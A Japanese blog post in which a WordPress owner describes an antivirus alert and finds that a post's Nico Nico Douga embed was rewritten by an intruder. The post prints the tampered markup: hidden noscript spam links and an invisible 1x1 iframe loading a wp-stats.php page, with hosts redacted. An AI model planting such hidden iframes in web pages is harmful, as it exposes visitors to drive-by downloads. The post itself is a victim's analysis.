■wordpressには穴があるんじゃないだろうか

wordpressを設置して１年。

放置しっぱなしのドメインがあって、そういえば明日で期限が切れるとおもって見に行った。

ウイルスバスターが反応した。

警告

ウイルスが見つかりました

ファイル名 wp-stats[1].htm

ウイルス JS_PSYME.XP

JS_PSYME.XP

概　要 対応方法 感染状況

参　照

ウイルスタイプ: JavaScript

別　名: Downloader (Symantec), TR/Dldr.HTML.Agent.IS (Avira),

感染報告の有無 : なし

言語: English

危険度: 低

感染報告: 低

ダメージ度: 低

感染力: 低

特　徴: Worm generic description

ざっと管理画面からどこか改変されてないかみてみたが見当たらなかった。

プラグインのせいだろうか？

いやそもそもこのSymantecの文字が気になる。

もしかして、ノートン先生をウイルス認定しているのだろうか？

気になる事があるとすれば、

購読者 - (Subscriber)が７名いること。

ユーザー登録してなんになるんだろう。

runPHP狙いだろうか。Subscriberには権限を与えていないので意味がないはずだとおもう。

コメント投稿狙いだろうか。

Akismet はインストールされてから 778 件のスパムを捕らえました。

Akismetがんばったね！！

ま、明日さくっと消しておこう。。。

追記。

わかった。記事の内容が書き換えられていた。

書き換えられていた記事は最後の書き込み。

ニコニコビデオのやつをはったやつだった。

ニコニコ動画のiframeの本来のタグを無効化して違うところを参照するifreameを書いてござった。

<iframe width="312" height="176" src="http://www.nicovideo.jp/thumb/XXXXXX" scrolling="no" style="border:solid 1px #CCC;" frameborder="0"><a href="http://www.nicovideo.jp/watch/XXXXXXX">【ニコニコ動画】XXXXXXXX</a></iframe>

<iframe width="312" height="176" src="http://www.nicovideo.jp/thumb/XXXXXX" scrolling="no" style="border:solid 1px #CCC;" frameborder="0"><a href="http://www.nicovideo.jp/watch/XXXXXXX">【ニコニコ動画】XXXXXXXX</a></iframe>

これが

<iframe width="312" height="176"
<noscript>XXXX（なんかスペイン語っぽい言葉）
 <a href="XXXXX">XXXXXXXX</a>
XXXXXX</noscript>
 src="<a href="http://www.nicovideo.jp/thumb/XXXXX">http://www.nicovideo.jp/thumb/XXXXX</a>" scrolling="no"
<noscript>
XXXXXXXX（上と違う内容）
<a href="XXXXXXX">XXXXXXX</a>
XXXXXXXX
</noscript>
 style="border:solid 1px #CCC;" frameborder="0"&gt;&lt;a href="
<a href="http://www.nicovideo.jp/watch/XXXXXX">
http://www.nicovideo.jp/watch/XXXXXX</a>
"&gt;【ニコニコ動画】XXXXXX(1/2)&lt;/a&gt;&lt;/iframe&gt;

<p&gt;&lt;iframe width="312" height="176" src="

<a href="http://www.nicovideo.jp/thumb/XXXX">http://www.nicovideo.jp/thumb/XXXXXX</a>

"<!-- Traffic Statistics --> 
<iframe src=XXXXXXXX/wp-stats.php width=1 height=1 frameborder=0></iframe>
<!-- End Traffic Statistics --> scrolling="no" style="border:solid 1px #CCC;" frameborder="0"&gt;&lt;a href="<a href="http://www.nicovideo.jp/watch/XXXX">http://www.nicovideo.jp/watch/XXXX</a>
"&gt;【ニコニコ動画】XXXXXXXX(2/2)&lt;/a&gt;&lt;/iframe&gt;

なにがしたいのかわからないが、

なんかもしかしたら３回ぐらい同じ系統で書き換えられてるのかもしれない。

やりかたはさっぱり想像できない。

でも、ここまで記事の内容が差し替えられるのだとしたら、管理者アカウントをのっとっちゃうのが一番てっとりばやいかな。

で、新しく記事が投稿されたのか監視するために購読者登録っと。

そんなところじゃないだろうか。。。

なんだろう。辞書アタックかな？

Permalink | 記事への反応(0) | 03:05

ツイートシェア